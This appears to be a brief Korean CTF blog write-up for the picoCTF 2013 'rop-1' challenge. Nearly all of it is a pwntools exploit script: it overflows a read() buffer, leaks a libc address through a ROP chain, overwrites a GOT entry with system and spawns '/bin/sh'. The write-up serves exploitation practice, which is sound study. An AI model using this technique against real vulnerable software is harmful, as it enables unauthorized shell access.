pico-ctf-2013 rop-1

CTF

pico-ctf-2013 rop-1

공부하자~~ 2018. 7. 14. 22:10

1. write, read 함수사용

2. read()에서 bof 발생하여 rop로 해결

exploit code

from pwn import *

read_plt = 0x8048380
read_got = 0x804a000
write_plt = 0x80483d0
write_got = 0x804a014
bss = 0x804a024
system_offset = 0x9ad60 
pppr = 0x804859d
pr = 0x8048364
binsh = "/bin/sh"

p = process("./rop1-fa6168f4d8eba0eb")

payload = "A"*140 
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

payload += p32(write_plt)
payload += p32(pr) 
payload += p32(bss)

log.info("Exploit..!")
p.sendline(payload)

read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))

p.sendline(binsh)
p.sendline(p32(system_addr))
p.interactive()